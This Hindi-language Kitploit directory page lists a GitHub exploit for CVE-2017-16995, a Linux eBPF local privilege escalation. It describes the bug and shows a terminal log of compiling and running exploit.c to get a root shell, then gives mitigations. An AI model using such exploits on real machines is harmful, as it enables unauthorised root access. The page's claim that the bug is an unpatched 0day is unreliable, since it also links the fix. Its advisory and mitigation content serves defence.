Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-16995 | Kitploit
उपकरण/GitHubGitHub/fei9747/cve-2017-16995
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणबाइनरी शोषण
GitHubfei9747/cve-2017-16995

CVE-2017-16995

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

भेद्यता विवरण

Ubuntu एक ओपन-सोर्स GNU/Linux ऑपरेटिंग सिस्टम है जो मुख्य रूप से डेस्कटॉप अनुप्रयोगों पर केंद्रित है और Debian GNU/Linux पर आधारित है। हाल ही में एक व्हाइट-हैट हैकर ने Ubuntu के नवीनतम संस्करण (Ubuntu 16.04) में एक स्थानीय विशेषाधिकार वृद्धि भेद्यता (local privilege escalation vulnerability) का खुलासा किया है, जिसका CVE ID CVE-2017-16995 है। यह भेद्यता eBPF bpf(2) को कॉल करने वाले Linux कर्नेल सिस्टम में मौजूद है। जब उपयोगकर्ता एक दुर्भावनापूर्ण BPF प्रोग्राम प्रदान करता है, तो eBPF वेरिफ़ायर मॉड्यूल में गणना त्रुटि उत्पन्न होती है, जिससे मनमाना मेमोरी रीड/राइट (arbitrary memory read/write) की समस्या उत्पन्न होती है। कम विशेषाधिकार वाला उपयोगकर्ता इस भेद्यता का उपयोग करके प्रशासनिक विशेषाधिकार प्राप्त कर सकता है। यह भेद्यता पुराने संस्करणों में पहले ही ठीक कर दी गई है, लेकिन नवीनतम संस्करण में इसका अभी भी शोषण किया जा सकता है। आधिकारिक रूप से अभी तक कोई पैच जारी नहीं किया गया है, इसलिए यह भेद्यता 0day स्थिति में है।

प्रभावित संस्करण

Linux Kernel Version 4.14-4.4 केवल Ubuntu/Debian वितरण को प्रभावित करता है

भेद्यता स्तर

उच्च जोखिम

प्रदर्शन

root@kitploit:~
bearcat@ubuntu:/opt$ lsb_release -a
<br>No LSB modules are available.
<br>Distributor ID: Ubuntu
<br>Description:    Ubuntu 16.04.4 LTS
<br>Release:        16.04
<br>Codename:       xenial
<br>bearcat@ubuntu:/opt$ uname -a
<br>Linux ubuntu 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
<br>bearcat@ubuntu:/opt$ id
<br>uid=1000(bearcat) gid=1000(bearcat) <br>groups=1000(bearcat),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
<br>bearcat@ubuntu:/opt$ ls
<br>exploit.c
<br>bearcat@ubuntu:/opt$ gcc exploit.c -o exploit
<br>bearcat@ubuntu:/opt$ ./exploit
<br>task_struct = ffff88003a0db800
<br>uidptr = ffff8800374b76c4
<br>spawning root shell
<br>root@ubuntu:/opt# id
<br>uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(bearcat)
<br>root@ubuntu:/opt#

भेद्यता समाधान

विधि 1:

फिलहाल कोई स्पष्ट पैच अपग्रेड समाधान प्रस्तावित नहीं किया गया है, लेकिन उपयोगकर्ताओं को सलाह दी जाती है कि वे कर्नेल पैरामीटर संशोधित करके सामान्य उपयोगकर्ताओं के लिए bpf(2) सिस्टम कॉल के उपयोग को प्रतिबंधित करें, जिससे भेद्यता के प्रभाव को कम किया जा सके: पैरामीटर "kernel.unprivileged_bpf_disabled = 1" सेट करके, bpf(2) कॉल तक पहुंच को प्रतिबंधित करके इस विशेषाधिकार वृद्धि को रोका जा सकता है
root@Ubuntu# echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled

विधि 2:

Linux कर्नेल संस्करण को अपग्रेड करें; यह सर्वर को पुनः प्रारंभ (reboot) करने के बाद प्रभावी होगा: इस चरण की विशिष्ट क्रियाएं पर्यावरण सेटअप प्रक्रिया में पहले ही वर्णित की जा चुकी हैं; उपयोगकर्ता को केवल कर्नेल संस्करण बदलने की आवश्यकता है!

विधि 3:

कोड पैच https://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6f

टूल डाउनलोड करें